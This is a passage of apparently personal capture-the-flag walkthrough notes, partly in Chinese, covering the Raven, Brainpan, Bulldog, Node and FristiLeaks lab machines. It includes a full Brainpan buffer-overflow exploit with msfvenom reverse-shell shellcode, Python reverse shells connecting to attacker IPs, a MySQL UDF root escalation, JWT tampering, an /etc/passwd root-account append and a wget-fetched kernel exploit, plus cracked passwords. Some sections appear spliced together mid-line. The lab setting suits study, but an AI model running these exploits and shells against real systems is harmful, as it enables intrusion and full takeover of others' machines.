uid=0(root) gid=0(root) groups=0(root)
root@Raven:/home/steven# whoami
root
root@Raven:/home/steven# cat /root/flag4.txt
 ______
| ___ \
| |_/ /__ ___   _____ _ __
|    // _` \ \ / / _ \ '_ \
| |\ \ (_| |\ V /  __/ | | |
\_| \_\__,_| \_/ \___|_| |_|

flag4{715dea6c055b9fe3337544932f2941ce}

CONGRATULATIONS on successfully rooting Raven!

This is my first Boot2Root VM - I hope you enjoyed it.

Hit me up on Twitter and let me know what you thought:

@mccannwj / wjmccann.github.io
root@Raven:/home/steven#
```

# Raven2

## nmap

```
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 09:32 CST
Nmap scan report for 172.20.10.2
Host is up (0.11s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
111/tcp open  rpcbind

Nmap done: 1 IP address (1 host up) scanned in 1.80 seconds
```

## 80

- Port 80 hosts a web application
- dirsearch
  - `/.DS_Store` looks the most promising
  - `/img` and `/js` are browsable
  - There is a `/wordpress/`
  - There is an extra `vendor` directory this time

## wordpress

- WordPress means running the open-source vulnerability scanner against it
- `wpscan --url raven.local/wordpress -evp -evt -eu`

```
[i] User(s) Identified:

[+] michael
 | Detected By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] steven
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
```

## exploit vendor

- PHPMailer
  - http://raven.local/vendor/changelog.md
  - Version: 5.2.17
  - RCE is possible (CVE-2016-10033, fixed in 5.2.18)!
    - https://www.exploit-db.com/exploits/40968
    - https://www.exploit-db.com/exploits/40974
  - With RCE in hand, try privesc and dumping the DB!

## Privilege escalation

- `uname -a`
  - `Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux`
- Tried a few privesc exploits, all failed
  - https://github.com/SecWiki/linux-kernel-exploits/

## dump databases

```
mysql> select user_nicename,user_pass from wp_users;
select user_nicename,user_pass from wp_users;
+---------------+------------------------------------+
| user_nicename | user_pass                          |
+---------------+------------------------------------+
| michael       | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 |
| steven        | $P$B6X3H3ykawf2oHuPsbjQiih5iJXqad. |
+---------------+------------------------------------+
```

- Cracked: michael/LOLLOLl
- Logging in with it gives nothing, and it doesn't work for SSH either
- Check what MySQL is running as
  - `ps -aux`
  - root, excellent!
- So a UDF (User Defined Function) should do it
  - https://www.exploit-db.com/exploits/7856
  - https://www.exploit-db.com/exploits/1181
  - https://www.exploit-db.com/exploits/1518
## Exploit & win

- Build the .so first
  - The compile line differs from the one on the exploit-db page QQ
  - It needed an extra `-fPIC`

```
gcc -g -fPIC -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

# upload raptor_udf2.so to the box, then:
mysql -u root -pR@v3nSecurity
mysql> use mysql;
mysql> create table hack(line blob);
mysql> insert into hack values(load_file('/tmp/raptor_udf2.so'));
mysql> select * from hack into dumpfile '/usr/lib/mysql/plugin/hacked.so';
mysql> create function do_system returns integer soname 'hacked.so';
mysql> select * from mysql.func;
select * from mysql.func;
+-----------+-----+---------------+----------+
| name      | ret | dl            | type     |
+-----------+-----+---------------+----------+
| do_system |   2 | raptor_udf.so | function |
+-----------+-----+---------------+----------+
1 row in set (0.00 sec)

mysql> select do_system('echo -e "meow\nmeow\n" > /tmp/meow');
mysql> SELECT do_system('useradd -ou 0 -g 0 meow');
mysql> SELECT do_system('cat /tmp/meow|passwd meow');
mysql> exit
root@Raven:/tmp# su meow
meow
# id
id
uid=0(root) gid=0(root) groups=0(root)
# whoami
whoami
root
#
```

# Brainpan

## nmap

```
nmap 172.20.10.0/24 -sn

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-26 19:48 CST
Nmap scan report for 172.20.10.1
Host is up (0.036s latency).
Nmap scan report for 172.20.10.3
Host is up (0.030s latency).
Nmap scan report for 172.20.10.8
Host is up (0.032s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.62 seconds

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-26 19:48 CST
Nmap scan report for 172.20.10.3
Host is up (0.0098s latency).
Not shown: 998 closed ports
PORT      STATE SERVICE
9999/tcp  open  abyss
10000/tcp open  snet-sensor-mgmt

Nmap done: 1 IP address (1 host up) scanned in 1.29 seconds
```

## Ports 9999 & 10000

- 9999 looks like a custom program; this is clearly meant to be pwned
- 10000 is Python's `SimpleHTTP/0.6 Python/2.7.3`
  - dirsearch
    - http://172.20.10.3:10000/bin/
    - [brainpan.exe](http://172.20.10.3:10000/bin/brainpan.exe)

## brainpan.exe

- `strings`
  - A suspicious string: `shitstorm`
  - Entering it is accepted, but nothing else happens
- pwn
  - cyclic pattern: the overflow reaches EIP after 524 bytes
  - `jmp esp` at `0x311712f3`
  - https://blog.csdn.net/lixiangminghate/article/details/53333710 walks through a similar approach
  - nop sled
  - shellcode

```
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.167 LPORT=80 EXITFUNC=thread -b "\x00\x0A\x0D" -f python
```

- Final exploit. Everything is `bytes` so it runs on Python 3 pwntools; the shellcode is the one msfvenom produced for the LHOST/LPORT above, so regenerate it for your own listener.

```python
from pwn import *

r = remote("172.20.10.3", 9999)

# msfvenom output (windows/shell_reverse_tcp, bad chars \x00\x0a\x0d)
buf = b""
buf += b"\xd9\xee\xbd\x28\xf7\x61\xd4\xd9\x74\x24\xf4\x5a\x2b"
buf += b"\xc9\xb1\x52\x31\x6a\x17\x03\x6a\x17\x83\xea\xf3\x83"
buf += b"\x21\x16\x13\xc1\xca\xe6\xe4\xa6\x43\x03\xd5\xe6\x30"
buf += b"\x40\x46\xd7\x33\x04\x6b\x9c\x16\xbc\xf8\xd0\xbe\xb3"
buf += b"\x49\x5e\x99\xfa\x4a\xf3\xd9\x9d\xc8\x0e\x0e\x7d\xf0"
buf += b"\xc0\x43\x7c\x35\x3c\xa9\x2c\xee\x4a\x1c\xc0\x9b\x07"
buf += b"\x9d\x6b\xd7\x86\xa5\x88\xa0\xa9\x84\x1f\xba\xf3\x06"
buf += b"\x9e\x6f\x88\x0e\xb8\x6c\xb5\xd9\x33\x46\x41\xd8\x95"
buf += b"\x96\xaa\x77\xd8\x16\x59\x89\x1d\x90\x82\xfc\x57\xe2"
buf += b"\x3f\x07\xac\x98\x9b\x82\x36\x3a\x6f\x34\x92\xba\xbc"
buf += b"\xa3\x51\xb0\x09\xa7\x3d\xd5\x8c\x64\x36\xe1\x05\x8b"
buf += b"\x98\x63\x5d\xa8\x3c\x2f\x05\xd1\x65\x95\xe8\xee\x75"
buf += b"\x76\x54\x4b\xfe\x9b\x81\xe6\x5d\xf4\x66\xcb\x5d\x04"
buf += b"\xe1\x5c\x2e\x36\xae\xf6\xb8\x7a\x27\xd1\x3f\x7c\x12"
buf += b"\xa5\xaf\x83\x9d\xd6\xe6\x47\xc9\x86\x90\x6e\x72\x4d"
buf += b"\x60\x8e\xa7\xc2\x30\x20\x18\xa3\xe0\x80\xc8\x4b\xea"
buf += b"\x0e\x36\x6b\x15\xc5\x5f\x06\xec\x8e\xf3\xc3\xe4\x46"
buf += b"\x64\xee\xf8\x52\xa6\x67\x1e\x30\x56\x2e\x89\xad\xcf"
buf += b"\x6b\x41\x4f\x0f\xa6\x2c\x4f\x9b\x45\xd1\x1e\x6c\x23"
buf += b"\xc1\xf7\x9c\x7e\xbb\x5e\xa2\x54\xd3\x3d\x31\x33\x23"
buf += b"\x4b\x2a\xec\x74\x1c\x9c\xe5\x10\xb0\x87\x5f\x06\x49"
buf += b"\x51\xa7\x82\x96\xa2\x26\x0b\x5a\x9e\x0c\x1b\xa2\x1f"
buf += b"\x09\x4f\x7a\x76\xc7\x39\x3c\x20\xa9\x93\x96\x9f\x63"
buf += b"\x73\x6e\xec\xb3\x05\x6f\x39\x42\xe9\xde\x94\x13\x16"
buf += b"\xee\x70\x94\x6f\x12\xe1\x5b\xba\x96\x01\xbe\x6e\xe3"
buf += b"\xa9\x67\xfb\x4e\xb4\x97\xd6\x8d\xc1\x1b\xd2\x6d\x36"
buf += b"\x03\x97\x68\x72\x83\x44\x01\xeb\x66\x6a\xb6\x0c\xa3"

# 524 bytes of padding, jmp esp (0x311712f3, little-endian), a short NOP sled, then the shellcode
payload = b"a" * 524 + p32(0x311712f3) + b"\x90" * 10 + buf
r.sendline(payload)
r.interactive()
```
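The "524" and "jmp esp" numbers above come from a cyclic pattern and a debugger. The script below is an added example (not the write-up's exploit) that does the pattern side without pwntools or Metasploit: it generates the de Bruijn sequence `cyclic`/`pattern_create` use, recovers the offset from the value seen in EIP, and assembles the padding/address/NOP-sled/shellcode layout of the exploit above. The Brainpan numbers (524, `0x311712f3`) are taken from the write-up; the EIP value computed in `__main__` is constructed from the pattern itself.

```python
"""De Bruijn cyclic pattern and EIP-offset lookup, the manual version of
pwntools' cyclic()/cyclic_find() or Metasploit's pattern_create/pattern_offset.
Added example, not the write-up's exploit."""
import string
import struct
from itertools import islice
from typing import Iterator, Union

ALPHABET = string.ascii_lowercase


def de_bruijn(alphabet: str = ALPHABET, n: int = 4) -> Iterator[str]:
    """Yield the de Bruijn sequence B(k, n): every n-character string over the
    alphabet occurs exactly once, so any n bytes that land in EIP are unique."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int) -> Iterator[str]:
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length: int, n: int = 4) -> bytes:
    """The first `length` bytes of the pattern, ready to send to the service."""
    return "".join(islice(de_bruijn(ALPHABET, n), length)).encode()


def cyclic_find(value: Union[int, bytes, str], n: int = 4) -> int:
    """Offset of the n bytes seen in EIP after the crash (-1 if not in the pattern).
    An int is taken as the little-endian register value the debugger shows."""
    if isinstance(value, int):
        needle = value.to_bytes(n, "little").decode("latin-1")
    elif isinstance(value, bytes):
        needle = value.decode("latin-1")
    else:
        needle = value
    if len(needle) != n:
        raise ValueError(f"need exactly {n} characters")
    window = ""
    for idx, ch in enumerate(de_bruijn(ALPHABET, n)):
        window = (window + ch)[-n:]
        if window == needle:
            return idx - n + 1
    return -1


def build_payload(offset: int, jmp_esp: int, shellcode: bytes, nops: int = 10) -> bytes:
    """Padding up to EIP, the jmp esp address (little-endian), a NOP sled, then the shellcode."""
    return b"a" * offset + struct.pack("<I", jmp_esp) + b"\x90" * nops + shellcode


if __name__ == "__main__":
    crash = cyclic(600)                          # stage 1: send this, read EIP in the debugger
    eip = struct.unpack("<I", crash[524:528])[0]  # constructed: what EIP holds on Brainpan
    print(hex(eip), "->", cyclic_find(eip))      # 524
    print(len(build_payload(524, 0x311712f3, b"\xcc" * 8)))
```

Because every 4-byte window of the pattern is unique, one crash is enough to read the offset; sending 600 bytes rather than exactly 524 also leaves room to confirm that ESP points into the tail of the buffer, which is what makes `jmp esp` usable.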
Z:\home\puck> 幹怎麼回去ㄌ 只好打一個 reverse shell python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.20.10.8",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' nc -lk 1111 python -c 'import pty;pty.spawn("/bin/bash")' ``` ## 提權 ``` puck@brainpan:~$ ls ls checksrv.sh web puck@brainpan:~$ sudo -l sudo -l Matching Defaults entries for puck on this host: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User puck may run the following commands on this host: (root) NOPASSWD: /home/anansi/bin/anansi_util puck@brainpan:~$ sudo /home/anansi/bin/anansi_util manual ls sudo /home/anansi/bin/anansi_util manual ls No manual entry for manual WARNING: terminal is not fully functional - (press RETURN) LS(1) User Commands LS(1) NAME ls - list directory contents SYNOPSIS ls [OPTION]... [FILE]... DESCRIPTION List information about the FILEs (the current directory by default). Sort entries alphabetically if none of -cftuvSUX nor --sort is speci‐ fied. Mandatory arguments to long options are mandatory for short options too. -a, --all do not ignore entries starting with . -A, --almost-all do not list implied . and .. --author Manual page ls(1) line 1 (press h for help or q to quit)!/bin/sh !/bin/sh # id uid=0(root) gid=0(root) groups=0(root) # whoami root ``` # bulldog 1 ## nmap ``` Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-05 09:22 CST Nmap scan report for 172.20.10.2 Host is up (0.0042s latency). Not shown: 997 closed ports PORT STATE SERVICE 23/tcp open telnet 80/tcp open http 8080/tcp open http-proxy Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds ``` 有 `telnet`,試著連線看看 ``` Trying 172.20.10.2... Connected to 172.20.10.2. Escape character is '^]'. SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2 ... 
``` 好吧,他只是把 `ssh` 開在 23 port,繼續搜尋其他線索 ## 80,8080 port web application - 先進行 `dirsearch` 掃看看 ``` [09:24:11] Starting: [09:24:20] 301 - 0B - /admin -> http://172.20.10.2:8080/admin/ [09:24:24] 302 - 0B - /admin/?/login -> http://172.20.10.2:8080/admin/login/?next=/admin/%3F/login [09:24:24] 302 - 0B - /admin/ -> http://172.20.10.2:8080/admin/login/?next=/admin/ [09:24:27] 301 - 0B - /admin/login -> http://172.20.10.2:8080/admin/login/ [09:25:16] 301 - 0B - /dev -> http://172.20.10.2:8080/dev/ [09:25:16] 200 - 3KB - /dev/ [09:25:43] 200 - 1KB - /robots.txt Task Completed ``` - admin - 發現是 `django`,找看看 cve - https://nvd.nist.gov/vuln/detail/CVE-2019-3498 - u洞但沒用! - 沒找到什麼有機會利用的漏洞 - login - 預設密碼試試 - 沒用 - sql injection - 沒用 - dev - 有一個 `webshell` - 開心點進去發現 `Please authenticate with the server to use Web-Shell`,至少需要有一組帳號的權限 - 網頁最下方有會員 list,先觀察 html,發現有藏 hash - 拿去 cmd5 identify,發現是 sha1 - 隨意找一個 decrypt 網站,有兩組可以 decrypt - nick & sarah - 到 admin page 登入,成功使用 webshell ``` ddf45997a7e18a25ad5f5cf222da64814dd060d5 d8b8dd5e7f000b8dea26ef8428caf38c04466b3e 2/2 found (100%) ddf45997a7e18a25ad5f5cf222da64814dd060d5 : bulldog d8b8dd5e7f000b8dea26ef8428caf38c04466b3e : bulldoglover Found in 0.24s ``` ## webshell - 限制了以下的指令 - ifconfig、ls、echo、pwd、cat、rm - 想辦法繞過 ```=command Command : ls | id uid=1001(django) gid=1001(django) groups=1001(django),27(sudo) INVALID COMMAND. I CAUGHT YOU HACKER! ';' CAN BE USED TO EXECUTE MULTIPLE COMMANDS!! 
```

- So `;` is out, but a pipe works. Next check for `wget`: it is available
- Use it to pull a Python reverse shell onto the box and run it
- Get a remote shell

```=python
import socket
import subprocess
import os

# Connect back to the attacker's listener (adjust host and port to your setup)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.60", 1111))
# Point the shell's stdin, stdout and stderr at the socket
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])
```

- As before, upgrade to a pty once the reverse shell lands
    - `python -c 'import pty;pty.spawn("/bin/bash")'`

## remote shell

- `/etc/passwd`
    - There is another user, `bulldogadmin`; the next step is probably that account's password
- `db.sqlite3`
    - Dump it with `strings`
    - It contains a hash that would not crack
- `cd bulldogadmin` and look around
    - `ls -al`
    - Suspicious directory: `.hiddenadmindirectory`
    - It contains a `note` file we have permission to read

```
Nick,

I'm working on the backend permission stuff. Listen, it's super prototype but I think it's going to work out great. Literally run the app, give your account password, and it will determine if you should have access to that file or not!

It's great stuff! Once I'm finished with it, a hacker wouldn't even be able to reverse it! Keep in mind that it's still a prototype right now. I am about to get it working with the Django user account. I'm not sure how I'll implement it for the others. Maybe the webserver is the only one who needs to have root access sometimes?

Let me know what you think of it!

-Ashley
```

- The binary `customPermissionApp`
    - Won't run; look at the `strings` output instead

```
libc.so.6
puts
__stack_chk_fail
system
__libc_start_main
__gmon_start__
GLIBC_2.4
GLIBC_2.2.5
UH-H
SUPERultH
imatePASH
SWORDyouH
CANTget
dH34%(
AWAVA
AUATL
[]A\A]A^A_
Please enter a valid username to use root privileges
Usage: ./customPermissionApp <username>
sudo su root
;*3$"
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.7585
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
customPermissionApp.c
__FRAME_END__
...
```

- The chunks `SUPERultH`, `imatePASH`, `SWORDyouH`, `CANTget` are one string written into the binary eight bytes at a time; the stray `H` between them is an instruction byte that `strings` happens to print, not part of the text. Joined, it reads `SUPERultimatePASSWORDyouCANTget`
- Try it over `ssh` for the user found earlier, `bulldogadmin`: wrong
- Look again: the binary calls `system` with `sudo su root`. `sudo` asks for the calling user's own password, and the note says the app is being wired up to the Django account, so this string is django's password
- django is in the `sudo` group, so `sudo su root` with it: win

```
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ sudo su root
[sudo] password for django: SUPERultimatePASSWORDyouCANTget
root@bulldog:/home/bulldogadmin/.hiddenadmindirectory#
root@bulldog:/home/bulldogadmin/.hiddenadmindirectory# id
uid=0(root) gid=0(root) groups=0(root)
```

# Bulldog2

- nmap
    - `80/tcp open http`

## JWT

- Find a user account
- Log in
    - sqlmap: nothing
    - Brute-force it
    - ![](https://i.imgur.com/7Y70X4x.png)
- Once logged in as that user a JWT appears; decode it at jwt.io

```
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwYXlsb2FkIjp7Im5hbWUiOiJBZG9scGhvIEtpcmJ5IiwiZW1haWwiOiJhZG9scGhva2lyYnlAaGFwcHltYWlsLmNvbSIsInVzZXJuYW1lIjoiaXBhZG9scGhvIiwiYXV0aF9sZXZlbCI6InN0YW5kYXJkX3VzZXIiLCJyYW5kIjoxNn0sImlhdCI6MTU1MjI0MTk2NCwiZXhwIjoxNTUyODQ2NzY0fQ.doQtz4CPm9TPNU2ivy-zW42iG-RBY9BAEjmsdxXJ-go
```

![](https://i.imgur.com/uzXDBwl.png)

- Decoded, the header is `{"alg":"HS256","typ":"JWT"}` and the payload is `{"payload":{"name":"Adolpho Kirby","email":"adolphokirby@happymail.com","username":"ipadolpho","auth_level":"standard_user","rand":16},"iat":1552241964,"exp":1552846764}`. `auth_level` is the field that matters
- https://www.freeformatter.com/javascript-escape.html#ad-output
    - Used to un-escape the site's JavaScript so it can be read
- Search the code for `token`; a few key lines show up
    - ![](https://i.imgur.com/NZ5kU2q.png)
- Modify them
    - ![](https://i.imgur.com/FGXerLW.png)
- The Admin Panel appears

## Admin Panel to cmdi

- Stuck here for a very long time; a scan eventually opened up new ground
    - ![](https://i.imgur.com/7txbeeB.png)
- reverse shell

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.20.10.8",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import pty;pty.spawn("/bin/bash")'
```

## SHELL AND ROOT

![](https://i.imgur.com/d1pQmFc.png)

Stared at this for ages...
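What shortens the "stared at this for ages" stage is a quick, systematic local triage before reaching for kernel exploits. The block below is an added example, not part of the original writeup: a Python check that asks whether the current user can write `/etc/passwd` and parses passwd-format text for accounts that already carry uid 0 or keep a password hash inline. It runs against a constructed sample (the `meow` entry is the shape of line an attacker appends once the file is writable); the sample accounts and the `/etc/passwd` path are assumptions.

```python
"""Quick triage for the /etc/passwd privilege-escalation path (added example).

Two questions worth answering before spending hours on kernel exploits:
  1. Can the current user write /etc/passwd at all?
  2. Does any entry already resolve to uid 0 besides root, or keep a
     password hash in passwd itself instead of /etc/shadow?
A second uid 0 account with an inline hash is exactly what an attacker
appends when the file is writable, so the same function doubles as a
detection after the fact.
"""
import os
from dataclasses import dataclass

# Constructed sample for this example; the last line mirrors an attacker-added entry.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
bob:x:1000:1000::/home/bob:/bin/bash
meow:$1$meow$U4BAcyBwZZmNa4Ku/4zcF1:0:0:root:/root:/bin/sh
"""

# Field-2 values meaning "password lives in /etc/shadow" or "account locked";
# anything else in that field is a hash that bypasses shadow entirely.
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


@dataclass(frozen=True)
class Finding:
    line_no: int
    user: str
    reason: str


def parse_passwd(text):
    """Yield (line_no, fields) for each non-empty, non-comment line.

    Lines that do not have the seven colon-separated passwd fields are
    yielded with fields=None so the caller can report them.
    """
    for line_no, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        yield line_no, (fields if len(fields) == 7 else None)


def audit_passwd(text):
    """Return a list of Finding for suspicious entries in passwd-format text."""
    findings = []
    for line_no, fields in parse_passwd(text):
        if fields is None:
            findings.append(Finding(line_no, "?", "malformed entry (expected 7 fields)"))
            continue
        user, pw, uid, _gid, _gecos, _home, _shell = fields
        if not uid.isdigit():
            findings.append(Finding(line_no, user, "non-numeric uid"))
            continue
        if int(uid) == 0 and user != "root":
            findings.append(Finding(line_no, user, "uid 0 account other than root"))
        if pw == "":
            findings.append(Finding(line_no, user, "empty password field (no password needed)"))
        elif pw not in SHADOWED_OR_LOCKED:
            findings.append(Finding(line_no, user, "password hash stored in passwd, not in shadow"))
    return findings


def passwd_writable(path="/etc/passwd"):
    """True if the calling process could write the file: the precondition for this privesc."""
    return os.access(path, os.W_OK)


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f"line {f.line_no}: {f.user}: {f.reason}")
    print("/etc/passwd writable by this user:", passwd_writable())
```

On a live box, `audit_passwd(open('/etc/passwd').read())` returning nothing while `passwd_writable()` returns `True` is the exact opening this machine leaves; running the same function again afterwards is a cheap way to spot the added account.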
Eventually it turned out that `/etc/passwd` is writable by the current user, so a second uid 0 account can simply be appended. The hash goes in the second field (generated with `openssl passwd -1`, an MD5-crypt hash), and `su` to the new account gives a root shell:

```
openssl passwd -1 -salt meow meow
$1$meow$U4BAcyBwZZmNa4Ku/4zcF1
echo 'meow:$1$meow$U4BAcyBwZZmNa4Ku/4zcF1:0:0:root:/root:/bin/sh' >> /etc/passwd
su meow
# id
uid=0(root) gid=0(root) groups=0(root)
```

![](https://i.imgur.com/hkMibPK.png)

# node

## nmap

- 3000
    - web application
- 22
    - ssh

## Port 3000: reading the client-side code

The AngularJS controllers served with the page map out the back-end API:

```=javascript
// admin.js
var controllers = angular.module('controllers');

controllers.controller('AdminCtrl', function ($scope, $http, $location, $window) {
  $scope.backup = function () {
    $window.open('/api/admin/backup', '_self');
  }

  $http.get('/api/session')
    .then(function (res) {
      if (res.data.authenticated) {
        $scope.user = res.data.user;
      } else {
        $location.path('/login');
      }
    });
});

// home.js
var controllers = angular.module('controllers');

controllers.controller('HomeCtrl', function ($scope, $http) {
  $http.get('/api/users/latest').then(function (res) {
    $scope.users = res.data;
  });
});

// login.js
var controllers = angular.module('controllers');

controllers.controller('LoginCtrl', function ($scope, $http, $location) {
  $scope.authenticate = function () {
    $scope.hasError = false;

    $http.post('/api/session/authenticate', {
      username: $scope.username,
      password: $scope.password
    }).then(function (res) {
      if (res.data.success) {
        $location.path('/admin');
      } else {
        $scope.hasError = true;
        $scope.alertMessage = 'Incorrect credentials were specified';
      }
    }, function (resp) {
      $scope.hasError = true;
      $scope.alertMessage = 'An unexpected error occurred';
    });
  };
});

// profile.js
var controllers = angular.module('controllers');

controllers.controller('ProfileCtrl', function ($scope, $http, $routeParams) {
  $http.get('/api/users/' + $routeParams.username)
    .then(function (res) {
      $scope.user = res.data;
    }, function (res) {
      $scope.hasError = true;
      if (res.status == 404) {
        $scope.errorMessage = 'This user does not exist';
      } else {
        $scope.errorMessage = 'An unexpected error occurred';
      }
    });
});
```

- The controllers expose the API routes: `/api/session`, `/api/session/authenticate`, `/api/users/latest`, `/api/users/<username>` and `/api/admin/backup`
- Requesting `http://172.20.10.3:3000/api/users/` (the whole collection rather than one profile) lists every account, including the admin
    - `myP14ceAdm1nAcc0uNT`
    - `dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af`
    - https://www.onlinehashcrack.com/hash-identification.php#results
        - SHA-256 (64 hex characters)
    - https://www.dcode.fr/sha256-hash
        - Cracks to: manchester

## download backup

- `myplace.backup`
    - Looks like base64
    - `cat myplace.backup | base64 -D > file.bin` (`-D` is the macOS flag; GNU `base64` uses `-d`)
    - `file file.bin`
        - `file.bin: Zip archive data, at least v1.0 to extract`
    - A zip, so unpack it
    - `zipinfo` shows it is a backup of the site
    - It is password-protected
    - Try `pkcrack`, a known-plaintext attack on ZipCrypto: the site's `jquery.js` is served in the clear and the same file sits inside the archive, which is exactly the plaintext/ciphertext pair the attack needs

```=shell
pkcrack -p jquery.js -c var/www/myplace/static/vendor/jquery/jquery.js -C file.zip
Or as a string: 'magicword' (without the enclosing single quotes)
Finished on Sat Mar 7 23:42:11 2019
```

```=javascript
// cat app.js | head -n 12
const express = require('express');
const session = require('express-session');
const bodyParser = require('body-parser');
const crypto = require('crypto');
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const path = require("path");
const spawn = require('child_process').spawn;
const app = express();

const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
```

- `app.js` hard-codes the MongoDB connection string, including a password for the account `mark`, plus a `backup_key`. The shell below is as `mark`, the user named in that connection string

## Privilege escalation

- https://www.exploit-db.com/download/44298
    - Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation
    - The box runs `4.4.0-93-generic`, inside the affected range

```=shell
mark@node:/$ uname -a
Linux node 4.4.0-93-generic #116-Ubuntu SMP Fri Aug 11 21:17:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
mark@node:/$ cd /tmp
mark@node:/tmp$ wget https://www.exploit-db.com/download/44298
mark@node:/tmp$ mv 44298 44298.c
mark@node:/tmp$ gcc -o exp 44298.c
mark@node:/tmp$ ./exp
task_struct = ffff88002c2eaa00
uidptr = ffff88002ef66784
spawning root shell
root@node:/tmp# id
uid=0(root) gid=0(root) groups=0(root),1001(mark)
```

# fristi

## fuzzing

- Port 80
    - dirsearch
        - robots.txt
        - image

## web

```
User-agent: *
Disallow: /cola
Disallow: /sisi
Disallow: /beer
```

- None of these three directories is the way in; guess other names next
- admin
- root
- user
- backups
- ...
- Finally, `fristi`
    - An admin panel
    - base64 hidden in the HTML
        - It decodes to an image
        - ![](https://i.imgur.com/ZAhHrB5.png)
    - user/keKkeKKeKKeKkEkkEk
    - admin/keKkeKKeKKeKkEkkEk
    - root/keKkeKKeKKeKkEkkEk
        - None of them work...
    - Reading the HTML again, there is a username in it
    - eezeepz/keKkeKKeKKeKkEkkEk
        - Logged in!

## upload test

```
Sorry, is not a valid file. Only allowed are: png,jpg,gif
Sorry, file not uploaded
```

- Try uploading `foo.php.gif`
    - Accepted: the check only looks at the final extension
    - Now work out how to turn that into a reverse shell

## shell

- `ps aux`
    - Nothing odd
- `cat checklogin.php`
    - Contains DB credentials; the database holds nothing useful
- `uname -a`
    - `Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux`
    - Tried a few kernel privesc exploits; all failed
- The home directories have something interesting

```=bash
bash-4.1$ cat notes.txt
Yo EZ,

I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.

echo "/home/admin/chmod -R 777 /home/admin " > runthis
drwxrwxrwx. 2 admin     admin      4096 Nov 19  2015 .
drwxr-xr-x. 5 root      root       4096 Nov 19  2015 ..
-rwxrwxrwx. 1 admin     admin        18 Sep 22  2015 .bash_logout
-rwxrwxrwx. 1 admin     admin       176 Sep 22  2015 .bash_profile
-rwxrwxrwx. 1 admin     admin       124 Sep 22  2015 .bashrc
-rwxrwxrwx  1 admin     admin     45224 Nov 18  2015 cat
-rwxrwxrwx  1 admin     admin     48712 Nov 18  2015 chmod
-rwxrwxrwx  1 admin     admin       737 Nov 18  2015 cronjob.py
-rwxrwxrwx  1 admin     admin        21 Nov 18  2015 cryptedpass.txt
-rwxrwxrwx  1 admin     admin       258 Nov 18  2015 cryptpass.py
-rwxrwxrwx  1 admin     admin     90544 Nov 18  2015 df
-rwxrwxrwx  1 admin     admin     24136 Nov 18  2015 echo
-rwxrwxrwx  1 admin     admin    163600 Nov 18  2015 egrep
-rwxrwxrwx  1 admin     admin    163600 Nov 18  2015 grep
